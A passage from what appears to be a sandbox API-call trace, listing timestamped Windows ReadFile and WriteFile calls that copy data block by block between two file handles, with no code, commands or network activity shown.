nNumberOfBytesToWrite=0x357, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.394] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.394] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x348, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.395] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.395] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.396] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.396] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x385, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.397] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.397] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.398] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.398] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.399] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.399] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.400] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.400] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.401] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.401] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.402] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.402] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.403] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.403] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.404] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x352, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.404] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.405] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.405] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.406] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.406] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.407] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x223, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.408] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.408] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.409] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.409] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.409] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.410] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3af, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.410] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.411] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x361, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.412] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.412] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.412] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.413] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3bd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.413] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.414] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.414] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.415] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x398, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.415] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.416] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.416] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.417] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.417] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.418] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x378, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.418] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.419] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x397, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.419] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.420] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x399, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.420] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.421] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.421] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x164, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.422] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.422] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.423] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x197, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.423] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.424] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.424] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.425] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.425] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.426] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.426] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.427] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x304, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.427] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.428] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.428] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.429] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.429] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.430] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.430] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x372, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.431] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.431] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.432] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x7d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.432] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.433] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.433] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.434] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.434] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.435] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.435] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.436] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3af, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.436] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.437] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.437] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.438] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x395, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.438] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.439] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ec, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.439] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.440] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x371, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.440] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.441] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.441] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.441] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x398, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.442] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.442] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: 